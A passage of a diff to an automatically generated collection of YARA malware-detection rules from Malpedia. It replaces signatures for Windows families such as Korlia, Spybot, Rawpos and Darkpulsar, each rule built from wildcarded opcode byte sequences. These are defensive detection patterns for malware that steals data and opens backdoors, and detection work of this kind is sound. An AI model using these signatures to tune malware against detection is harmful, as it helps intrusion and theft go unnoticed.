= { c645f700 807df700 0f85b1feffff 8b45ec 890424 e8???????? 8b45f0 } - $sequence_4 = { c9 c3 55 89e5 83ec28 c7042408000000 e8???????? } - $sequence_5 = { 8b4014 83c003 8945f4 8b450c } - $sequence_6 = { 894508 837d0800 741e 8b4508 890424 e8???????? } - $sequence_7 = { 8b45f8 83c002 01d0 0fb600 0fb6c0 c1e010 0145fc } - $sequence_8 = { e8???????? 8b4508 c780a401000000000000 90 c9 c3 55 } - $sequence_9 = { 894508 837d0800 740b 8b4508 890424 e8???????? 8b4508 } + $sequence_0 = { c744242880000000 c744242004000000 4533c9 418d5104 458d4101 ff15???????? 48898710180000 } + $sequence_1 = { 4c8bea 4b8b8cf7907c0200 4c8b15???????? 4883cfff 418bc2 498bd2 4833d1 } + $sequence_2 = { 83c7f8 81ffd6000000 0f87eb030000 488d1531c5ffff 0fb6843a24410000 8b8c824c400000 4803ca } + $sequence_3 = { 48895808 48896810 48897018 48897820 4156 33ed 4c8d352e910000 } + $sequence_4 = { 4c8d0d13210100 8bf9 488d150a210100 b907000000 4c8d05f6200100 e8???????? } + $sequence_5 = { eb7a 488d0dd0140200 e8???????? 85c0 0f94c0 eb67 } + $sequence_6 = { 488d15b6e80100 e9???????? 488d15bae80100 e9???????? } + $sequence_7 = { 488d1585ee0000 488d0d76ee0000 e8???????? 0fb605???????? } + $sequence_8 = { e9???????? 4c8d256b4e0100 8bee 498bc4 41bf01000000 } + $sequence_9 = { f20f1000 8b7808 e9???????? 488d05ae920100 4a8b0ce8 42f644313880 } condition: - 7 of them and filesize <1132544 + 7 of them and filesize <372736 } -rule MALPEDIA_Win_Whitebird_Auto : FILE +rule MALPEDIA_Win_Dyepack_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18c8f315-82f9-5211-979b-cd91dd0f89f6" + id = "66b3574f-c7a6-53f0-85d5-ab2a32e5f41d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whitebird_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dyepack_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "9614af5c53f8ac08af22eb37dac785c96bbf80265ac7367d1874d42f77f5a2ec" + logic_hash = "9d7b8dddf2871fef90109ccabdb579a142d1f80f2c5a6a3cb7a4f53499a52084" score = 75 quality = 75 tags = "FILE" @@ -177812,32 +180619,32 @@ rule MALPEDIA_Win_Whitebird_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a4302 84c0 7408 3c01 7404 } - $sequence_1 = { 8a4301 3c01 7404 3c02 } - $sequence_2 = { 8a4302 84c0 7408 3c01 7404 3c02 } - $sequence_3 = { eb09 80f92f 0f95c1 80c13f } - $sequence_4 = { 8a4302 84c0 7408 3c01 } - $sequence_5 = { ffb5c0fbffff 8930 ff15???????? 01b5c4fbffff ff8dbcfbffff 75dd ffb5c0fbffff } - $sequence_6 = { ff15???????? 488bcb ff15???????? b801000000 488b8c2480040000 4833cc e8???????? } - $sequence_7 = { 8b4d08 836d0808 d3e3 095d0c 46 3bf7 72ec } - $sequence_8 = { 488d542468 498bcd ffd0 3bc3 8bd0 7c28 8b442478 } - $sequence_9 = { 4833c4 4889842450250000 418bf9 458be0 448bf2 89542454 4c8be9 } + $sequence_0 = { 53 53 56 ffd7 8b442414 8b4c2410 33ed } + $sequence_1 = { 7cb2 7f08 8b4c2410 3be9 } + $sequence_2 = { 8b442414 8b4c2410 33ed 33ff 3bc3 7c60 7f0a } + $sequence_3 = { 741e 8b442418 3bc3 7416 03e8 8b442414 13fb } + $sequence_4 = { 1bc7 7815 7f08 81f900100000 } + $sequence_5 = { 56 ff15???????? 8b8c2428100000 53 51 } + $sequence_6 = { 3bcb 765a eb04 8b4c2410 2bcd } + $sequence_7 = { ff15???????? 85c0 741e 8b442418 3bc3 7416 03e8 } + $sequence_8 = { 5f 5e 5b 81c414100000 c3 8b3d???????? } + $sequence_9 = { ffd7 8d4c2418 53 51 8d54242c } condition: - 7 of them and filesize <139264 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Korlia_Auto : FILE +rule MALPEDIA_Win_Darkpulsar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d35af9df-a058-5a30-a77f-8fa81b1625c9" + id = "b29c7cf0-59bf-59a4-b8c5-d1ee53d551a4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.korlia_auto.yar#L1-L481" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkpulsar_auto.yar#L1-L401" license_url = "N/A" - logic_hash = "17b5ea46685442b751a30de5596fa43f96dfb43c44e790391afede4018d6463a" + logic_hash = "07b3040533891d5ece5d93ef76c617792a76fc1b169e5d22dab675082baad80b" score = 75 quality = 50 tags = "FILE" @@ -177851,153 +180658,66 @@ rule MALPEDIA_Win_Korlia_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 68???????? 51 ffd6 } - $sequence_1 = { 6a32 50 ff15???????? 85c0 7521 } - $sequence_2 = { 33c0 f2ae f7d1 49 83f90f 7604 } - $sequence_3 = { f7ef c1fa14 8bc2 c1e81f 03d0 52 } - $sequence_4 = { 8965e8 c645e401 c745fc00000000 52 } - $sequence_5 = { 59 5a c745fcffffffff 8a45e4 8b4df0 64890d00000000 5f } - $sequence_6 = { 81fb68584d56 0f9445e4 5b 59 5a c745fcffffffff } - $sequence_7 = { 7410 6a28 68???????? 6aff 53 6a00 } - $sequence_8 = { 6a00 ffd6 68???????? c705????????1c010000 ff15???????? } - $sequence_9 = { 6a01 53 53 53 51 ff15???????? 85c0 } - $sequence_10 = { 8b442404 56 6a00 6a00 6a01 6a00 } - $sequence_11 = { 6a01 6a00 6a00 6800000040 50 ff15???????? 8bf0 } - $sequence_12 = { e8???????? 8a4c2404 6a01 884814 8b4c240c 898840200000 } - $sequence_13 = { 8b4c240c 898840200000 58 c20800 e9???????? 6800060000 } - $sequence_14 = { 8bf0 83feff 7423 8b542410 8b44240c 8d4c2408 } - $sequence_15 = { 59 59 c3 8b65e8 ff7588 ff15???????? 833d????????ff } - $sequence_16 = { 50 56 ff15???????? 56 ff15???????? b001 5e } - $sequence_17 = { ff15???????? 833d????????ff 750c ff742404 ff15???????? } - $sequence_18 = { ff742410 ff742410 ff742410 e8???????? c21000 e8???????? 8a4c2404 } - $sequence_19 = { 6a00 680030c800 6a00 6a00 } - $sequence_20 = { b8447c0000 e8???????? 53 56 } - $sequence_21 = { 8d442444 894d00 8b542438 83c504 50 895500 } - $sequence_22 = { 6880000000 6800000400 8bce e8???????? } - $sequence_23 = { 8bf9 81e7ff000000 03f2 03f7 } - $sequence_24 = { ffd6 8d44240c 6804010000 50 } - $sequence_25 = { 83c504 50 895500 83c504 e8???????? d1e0 } - $sequence_26 = { 6a00 6a00 50 8bce e8???????? 6a00 } - $sequence_27 = { 51 ff15???????? a1???????? b981000000 } - $sequence_28 = { 750c ff15???????? 53 e9???????? } - $sequence_29 = { 0f8599000000 53 56 57 b940000000 } - $sequence_30 = { ffd6 eb06 8b35???????? a1???????? 3bc3 7403 50 } - $sequence_31 = { 68ff0f1f00 ff15???????? 85c0 740a } - $sequence_32 = { 8d542414 6a00 52 68???????? 6a00 ff15???????? } - $sequence_33 = { 85c0 740a 56 50 ff15???????? 8bf0 } - $sequence_34 = { 33c0 8dbc245e020000 66899c245c020000 f3ab } - $sequence_35 = { 7403 50 ffd6 b912010000 33c0 } - $sequence_36 = { f3ab aa b9f9000000 33c0 } - $sequence_37 = { 56 3bc3 57 740b 8b35???????? 50 } - $sequence_38 = { 6801000080 ff15???????? 85c0 0f8599000000 53 } - $sequence_39 = { 68???????? 51 ff15???????? 8b54240c 8bf0 } - $sequence_40 = { 40 81c408010000 c3 83c8ff } - $sequence_41 = { 5e 24fe 5b 40 } - $sequence_42 = { 83c9ff 33c0 68003e0000 f2ae f7d1 2bf9 } - $sequence_43 = { 50 8b4308 6a02 57 ffd0 85c0 750c } - $sequence_44 = { a0???????? 884102 ba???????? 8bf2 8a02 42 } - $sequence_45 = { 51 8b0d???????? 8d85c4f0ffff 6a05 6a04 50 } - $sequence_46 = { 8bc7 83e03f 6bc830 8b049578c14100 f644082801 7421 57 } - $sequence_47 = { 85f6 7439 8d4dd0 68???????? 51 c745d0306e4000 } - $sequence_48 = { ff15???????? 85c0 7421 6a3f 8d85fcfeffff } - $sequence_49 = { 6a00 ff15???????? 8bf8 85ff 7503 5f 5e } - $sequence_50 = { 5d c20c00 ffb5f8efffff 8b35???????? } - $sequence_51 = { 51 e8???????? 8d942404030000 68???????? 52 } - $sequence_52 = { 50 51 e8???????? 8b742430 83c41c } - - condition: - 7 of them and filesize <263168 -} -rule MALPEDIA_Win_Crytox_Auto : FILE -{ - meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0ddd8657-2514-5374-8039-613e49f7d728" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crytox_auto.yar#L1-L134" - license_url = "N/A" - logic_hash = "53a20cdadf7c04d8a44d2123a9699db23173b707dd2f3ef0f82ea172db5f35fb" - score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { eb7d 85f6 7479 c645c800 e8???????? 85c0 89c3 } - $sequence_1 = { dfe9 0f86c2e3ffff 89442410 89c1 c1fa02 db442410 c1f902 } - $sequence_2 = { e8???????? 8b4510 3b4518 741d 0fbf45c4 c1e002 89442408 } - $sequence_3 = { e8???????? 89c3 8b45dc 85c0 0f84adfeffff 8d65f4 89d8 } - $sequence_4 = { eb02 d9c9 83c301 038d30ffffff 399d04ffffff 7f8e ddd9 } - $sequence_5 = { f1 807de700 89d3 7510 6bc22c 80b84442660000 0f85ac000000 } - $sequence_6 = { c5c5fe3d???????? c5c572e70e c5fd7f9c24000b0000 c5e572e50e c5d572e60e c5fd7f9c24e0090000 c5ddfe15???????? } - $sequence_7 = { dee9 d95dc0 8b45e0 83c001 8d148500000000 8b4508 01d0 } - $sequence_8 = { e9???????? 8b7d24 8b4510 85ff c70000000000 742b 8b4508 } - $sequence_9 = { dec9 d96c2424 db5c2420 d96c2426 8b742420 d9e8 dfe9 } - - condition: - 7 of them and filesize <6156288 -} -rule MALPEDIA_Win_Badencript_Auto : FILE -{ - meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "14e6e038-56f2-594e-a7b6-4f5872213cea" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badencript_auto.yar#L1-L123" - license_url = "N/A" - logic_hash = "2996c0cacc073d062d9370be45e59795727eb489c538600d3d982f614b0ed8f2" - score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { 8bfe a1???????? 897de0 394508 7c1f 3934bd48414100 } - $sequence_1 = { 8a07 8b0c9548414100 8844192e 8b049548414100 } - $sequence_2 = { 6af6 ff15???????? 8b04bd48414100 834c0318ff 33c0 eb16 e8???????? } - $sequence_3 = { 53 ffd7 83ee01 75eb 8b4dfc 33c0 } - $sequence_4 = { 8b049d48414100 8945d4 8955e8 8a5c1029 80fb02 7405 80fb01 } - $sequence_5 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 f7c703000000 } - $sequence_6 = { 8b049548414100 f644082801 740b 56 e8???????? 59 } - $sequence_7 = { 0f859b010000 c745e0980f4100 8b4508 8bcf 8b7510 c745dc01000000 dd00 } - $sequence_8 = { 58 6bc000 c7809439410002000000 6a04 } - $sequence_9 = { 50 8b04bd48414100 ff743018 ff15???????? 85c0 0f95c0 5f } + $sequence_0 = { ff25???????? 33c0 40 c20c00 68???????? 64ff3500000000 } + $sequence_1 = { c20c00 68???????? 64ff3500000000 8b442410 896c2410 8d6c2410 2be0 } + $sequence_2 = { c21000 ff25???????? ff25???????? ff25???????? 33c0 } + $sequence_3 = { 3a01 1bc0 83e0fe 40 5f } + $sequence_4 = { 803f00 742e 47 ff450c 0fbe07 } + $sequence_5 = { 56 8b35???????? 57 8b7d08 eb09 } + $sequence_6 = { 59 59 3bd8 74e0 0fb607 } + $sequence_7 = { 50 ffd6 8bd8 8b450c 0fbe00 50 ffd6 } + $sequence_8 = { 56 e8???????? ff742414 50 e8???????? 83c410 } + $sequence_9 = { 6a01 50 ff15???????? 8bf0 59 } + $sequence_10 = { 83c410 83f8ff 0f95c1 49 8bc1 } + $sequence_11 = { 53 33d2 56 57 33c0 } + $sequence_12 = { ffd7 59 5f 5e c3 8b4c2404 85c9 } + $sequence_13 = { 8d45cc 50 57 e8???????? 83c410 85c0 } + $sequence_14 = { ffd6 59 59 8945f8 } + $sequence_15 = { f7d8 59 1bc0 59 40 c3 e9???????? } + $sequence_16 = { 8b5d10 56 8b7508 33d2 } + $sequence_17 = { e8???????? ff7514 89460c e8???????? } + $sequence_18 = { ff15???????? 8bf8 59 59 85ff 7502 } + $sequence_19 = { 8bc1 c3 8b442404 85c0 7501 c3 } + $sequence_20 = { 33c0 33d2 c3 8bff 55 8bec b863736de0 } + $sequence_21 = { e8???????? 59 5e 83f8ff } + $sequence_22 = { 59 5e 8b45fc c9 c3 } + $sequence_23 = { 56 e8???????? 59 85c0 7625 } + $sequence_24 = { e8???????? 8bf0 46 56 ff15???????? 59 } + $sequence_25 = { 40 894588 83659800 85c0 } + $sequence_26 = { 8903 894304 5f 8bc6 } + $sequence_27 = { ff75f0 56 57 ff15???????? 83c40c } + $sequence_28 = { 00db 7313 752f 3b742404 0f830b010000 } + $sequence_29 = { 8945cc 8945d0 8b4608 6a05 50 885dec } + $sequence_30 = { 66894df5 c745f702000000 e8???????? 83c408 } + $sequence_31 = { 0fb606 50 ff15???????? 83c41c 85c0 } + $sequence_32 = { 48 4e 897c2414 75eb 5f 8d4240 } + $sequence_33 = { 668903 8b45e8 8930 33c0 ebdc ff742408 ff15???????? } + $sequence_34 = { 00db 7309 75f4 8a1e 46 10db } + $sequence_35 = { 00db 7313 75e1 3b742404 0f8318010000 } + $sequence_36 = { 51 51 8b4508 8b4d0c 894dfc } + $sequence_37 = { 0facf908 c1ef08 48 4e } + $sequence_38 = { 8945e0 8945e4 8945d4 8945d8 8b450c 897de8 897ddc } + $sequence_39 = { 8d8df9feffff 53 51 899d5ceeffff 899d60eeffff } + $sequence_40 = { 8b4d08 8d7d0c 31c0 f3aa } + $sequence_41 = { ffd3 ff7594 ff15???????? 83c414 837d9c00 741c 837d0c07 } + $sequence_42 = { 33d7 c1ea10 5f 33d1 } + $sequence_43 = { 8bec 8b4508 894508 d94508 5d } condition: - 7 of them and filesize <335872 + 7 of them and filesize <491520 } -rule MALPEDIA_Win_Mistcloak_Auto : FILE +rule MALPEDIA_Win_Tokyox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bcb29aaa-c37e-5c55-be1e-5d06aa41cabd" + id = "6ca744f8-6e83-57d0-b9b1-d948cf62f189" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mistcloak_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tokyox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tokyox_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "6962ced189f702e03fc18d236cee46a2a0844476537e8c819ea6f1c43f9c0922" + logic_hash = "6c96cc95cf53b382f98148013ad4ad66eb649ce28d4ba112298bfa55f06ac1c7" score = 75 quality = 75 tags = "FILE" @@ -178011,32 +180731,32 @@ rule MALPEDIA_Win_Mistcloak_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b049590500110 f644082801 740b 56 e8???????? 59 8bf0 } - $sequence_1 = { 660f282d???????? 660f59f5 660f28aa70100110 660f54e5 660f58fe 660f58fc } - $sequence_2 = { 8b0c8590500110 8b45f8 807c012800 7d46 } - $sequence_3 = { 0f85b1000000 8b4508 dd00 ebc2 c745e418120110 eb19 } - $sequence_4 = { 6bc618 57 8db8104e0110 57 } - $sequence_5 = { 7429 83e805 7415 83e801 0f8595010000 c745e408120110 } - $sequence_6 = { c745e408120110 e9???????? c745e404120110 e9???????? 894de0 c745e404120110 e9???????? } - $sequence_7 = { 85f6 7420 6bc618 57 8db8104e0110 57 } - $sequence_8 = { 8bc1 3914c5781a0110 7408 40 } - $sequence_9 = { 8b45b4 8b0c8590500110 8a043b 03ce 8b75dc 03cb 43 } + $sequence_0 = { 6685c0 75e8 8d8570ffffff 8bf0 } + $sequence_1 = { bb0f000000 8975d8 8975e8 51 68ffff0000 50 } + $sequence_2 = { ff15???????? 85c0 0f8456010000 837d1000 751b 68c8000000 } + $sequence_3 = { 8d4598 8bcb 50 6888130000 8d45dc 50 e8???????? } + $sequence_4 = { 8d854cf5ffff 50 68???????? ff15???????? } + $sequence_5 = { 0f114590 0f104010 0f1145c0 0f1145a0 } + $sequence_6 = { ff730c ffd7 e9???????? 8d8550ffffff 0f57c0 50 0f114310 } + $sequence_7 = { 8d85f0faffff c645a000 50 ff75a0 8d4de8 } + $sequence_8 = { 8bf8 56 53 57 e8???????? 0f1045d0 } + $sequence_9 = { 668903 8d5101 8a01 41 84c0 75f9 ff75f8 } condition: - 7 of them and filesize <196608 + 7 of them and filesize <237568 } -rule MALPEDIA_Win_Whiskerspy_Auto : FILE +rule MALPEDIA_Win_Rawpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ad364f6a-593c-546a-abca-058cacdb86c1" + id = "286abeec-e79d-5e9e-ac0c-a8048144fd9d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whiskerspy_auto.yar#L1-L150" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rawpos_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "5c2084905c4059cab930cb01fc75781ec2a6ce873c993665138e09c62922860b" + logic_hash = "aa38577b3237b68cd5a9fc2dd4b4a121098ac6a8fc6a84d75e625596e4cdd326" score = 75 quality = 75 tags = "FILE" @@ -178050,37 +180770,32 @@ rule MALPEDIA_Win_Whiskerspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b06 8bcf d3e8 a801 } - $sequence_1 = { 488bcf c645e57d c645e67d c645e77d c645e87d } - $sequence_2 = { 458bc6 488d95c0020000 488d8d80010000 ff15???????? 488d4c2460 ff15???????? } - $sequence_3 = { 5d c3 418bca 48899c2440020000 } - $sequence_4 = { 33c0 e9???????? c685c0020000c8 c685c1020000d3 } - $sequence_5 = { e8???????? 0f2805???????? 4c8d45b0 0f280d???????? 488d55f0 } - $sequence_6 = { 8bf9 488d1507c10000 b903000000 4c8d05f3c00000 e8???????? } - $sequence_7 = { 85c0 7428 817c245000040000 74b4 eb1c } - $sequence_8 = { 0fbec1 83e820 83e07f 8b04c5d43f4300 } - $sequence_9 = { 33c5 8945fc 53 8bd9 899540ffffff 8b4d0c } - $sequence_10 = { f30f38f6f8 897de4 b800000000 8b7de8 660f38f6f9 } - $sequence_11 = { 8b45ec 3bc6 7c3a 7f04 } - $sequence_12 = { 6af6 ff15???????? 8b04bd403d4400 834c0318ff 33c0 } - $sequence_13 = { 75f8 8bfe 8bca 8bb588feffff } - $sequence_14 = { a3???????? 8bcf e8???????? 8325????????00 8325????????00 } + $sequence_0 = { 47 bb01000000 3b5df8 7d17 8b45bc } + $sequence_1 = { eb22 8b550c ff02 8b0a 83f963 } + $sequence_2 = { 3b7594 7231 8b5520 52 6a00 8b4d18 8bd6 } + $sequence_3 = { c700???????? e9???????? bb40000000 ff45e0 e9???????? 33c0 8d55b8 } + $sequence_4 = { 7544 56 6a00 8b5518 83c703 52 53 } + $sequence_5 = { 83e805 7422 eb3b 8d55b4 8955b0 eb41 8b4db0 } + $sequence_6 = { c1e003 33db 8a1a 03c3 83c0d0 8b5dfc ff45fc } + $sequence_7 = { 83e201 83c703 8955e4 eb3f 33c9 8a0f } + $sequence_8 = { 51 50 ff550c 83c408 ff4df8 f7c601000000 0f855afaffff } + $sequence_9 = { 837da4ff 750c 8bc3 43 3b45ec 0f82abfeffff 837de400 } condition: - 7 of them and filesize <591872 + 7 of them and filesize <466944 } -rule MALPEDIA_Win_Logtu_Auto : FILE +rule MALPEDIA_Win_Spybot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c67bd86c-2bf9-53d0-9e56-6b46a7295f73" + id = "bb20c1b9-da8a-50d3-8d1c-08fd01abaeb2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.logtu_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spybot_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "a1a55d055cae44fc8e92b272f8aaf6bf080cbc3cc39bc731b57992d62cbc8c84" + logic_hash = "f1b579b5b1ee691f466e64e8179031f49e4fd32bcc6dd2bb1d3af2d36456dc74" score = 75 quality = 75 tags = "FILE" @@ -178094,32 +180809,32 @@ rule MALPEDIA_Win_Logtu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf0 8d85a4fdffff 68???????? 50 ff15???????? } - $sequence_1 = { ff15???????? 8d8534ffffff 50 ff15???????? 6a01 } - $sequence_2 = { 50 6a64 6a00 ff15???????? 85c0 7509 8b45bc } - $sequence_3 = { 8bec 81ec98050000 a1???????? 33c5 8945fc 53 } - $sequence_4 = { 55 8bec 81ec98050000 a1???????? 33c5 8945fc 53 } - $sequence_5 = { 8d8574faffff 50 8d8534ffffff 50 } - $sequence_6 = { 50 8d85fcf7ffff 68???????? 50 e8???????? 8d85fcf7ffff 6800040000 } - $sequence_7 = { 6a01 8bf0 8d85a4fdffff 68???????? } - $sequence_8 = { 8d8584faffff 50 8d8574faffff 50 8d8534ffffff } - $sequence_9 = { 8d8578faffff 50 8d8584faffff 50 } + $sequence_0 = { 50 ffb574ffffff ff750c e8???????? 83c428 e9???????? } + $sequence_1 = { 50 e8???????? 83c40c 8d4508 be08010000 50 } + $sequence_2 = { 8d45ec 50 e8???????? 8d45ec 885dee 50 8d8548ffffff } + $sequence_3 = { 80bd48ffffff30 7c09 80bd48ffffff39 7e16 6a03 8d8548ffffff 68???????? } + $sequence_4 = { 56 68???????? e8???????? 59 85c0 59 0f85d7000000 } + $sequence_5 = { 3b35???????? 0f83c5010000 8bc6 83e61f c1f805 c1e603 8d1c85e07e5100 } + $sequence_6 = { 69c034020000 59 389890814400 0f84fb2b0000 395df4 0f84f22b0000 ff7520 } + $sequence_7 = { 8d850cfbffff 53 50 68???????? 53 53 ff15???????? } + $sequence_8 = { 898510fbffff 8b45fc 898598fbffff 8b45f8 3bf3 89859cfbffff 751c } + $sequence_9 = { 750b 57 ff15???????? 8bc6 eb02 } condition: - 7 of them and filesize <924672 + 7 of them and filesize <2367488 } -rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE +rule MALPEDIA_Win_Touchmove_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "31787da1-ee36-51da-9ab0-837844c74a17" + id = "a88e9c25-4116-5e49-8a2c-fef3336f0802" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pseudo_manuscrypt_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.touchmove_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "f95219f8df4fada7a5809becd0c4a0a18721619c73177d4ad9f3ddc17aca2388" + logic_hash = "519a7e3bd048a6a0769391087a62b1ec389f7202cc576a740e9eb0fb3d43844d" score = 75 quality = 75 tags = "FILE" @@ -178133,32 +180848,32 @@ rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8473ffffff 8bd6 8bcf e8???????? 85c0 0f8f62ffffff 53 } - $sequence_1 = { 668906 e8???????? 8b45fc 83c404 8bfb 3b18 75bd } - $sequence_2 = { 33db 8d857cfdffff 53 50 53 683f010f00 53 } - $sequence_3 = { 6a00 6a00 6a00 6a18 ffd6 6a00 6a00 } - $sequence_4 = { 8bec 56 8bb17c010000 85f6 742a 8b4508 33d2 } - $sequence_5 = { 6a04 68ffff0000 53 ffd6 0bc7 5f 5e } - $sequence_6 = { 57 8945fc 8d140b 8bc8 0f44d3 52 e8???????? } - $sequence_7 = { 7554 5f 33c0 5e 8b4dfc 33cd e8???????? } - $sequence_8 = { 89442474 8d842480000000 6804010000 50 c744246c01010000 ff15???????? 68???????? } - $sequence_9 = { 8d85d0fdffff 50 56 ff15???????? 85c0 742c 53 } + $sequence_0 = { 41b800040000 488d8c2452010000 e8???????? 4c8d442448 488d152df90000 } + $sequence_1 = { 488d157af70000 488d8d90000000 e8???????? 4c8d8590000000 33d2 33c9 } + $sequence_2 = { 7528 48833d????????00 741e 488d0d499f0000 e8???????? 85c0 } + $sequence_3 = { 41b8ee000000 488d8d92430000 e8???????? c6858044000000 33d2 41b8ff000000 488d8d81440000 } + $sequence_4 = { ff15???????? 488d442450 4889442420 458bce 4533c0 488d9580410000 48c7c102000080 } + $sequence_5 = { 0f8514010000 4c8d2d36cd0000 41b804010000 668935???????? 498bd5 ff15???????? 418d7c24e7 } + $sequence_6 = { 48833d????????00 0f844d040000 48833d????????00 0f843f040000 } + $sequence_7 = { 833d????????00 7505 e8???????? 488d3d40e00000 41b804010000 } + $sequence_8 = { 488bfb 488bf3 48c1fe05 4c8d25bebd0000 83e71f 486bff58 } + $sequence_9 = { 8bc8 e8???????? ebc9 488bcb 488bc3 488d1597e40000 48c1f805 } condition: - 7 of them and filesize <753664 + 7 of them and filesize <224256 } -rule MALPEDIA_Win_Cotx_Auto : FILE +rule MALPEDIA_Win_Bachosens_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4cbfd2a1-cbfc-5404-9f22-8e027db9306c" + id = "512fddd0-592d-56ea-af08-938454f6edb9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cotx_auto.yar#L1-L111" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bachosens_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "5f62f869de8e5b67f4dbb19d8460c8365da1f60d9f53861111556d3c0f9ba6d4" + logic_hash = "b427aef6cac4c70adae9906b44868965e5c9a8d697254ea4be31acc54b01936b" score = 75 quality = 75 tags = "FILE" @@ -178172,32 +180887,32 @@ rule MALPEDIA_Win_Cotx_Auto : FILE malpedia_sharing = 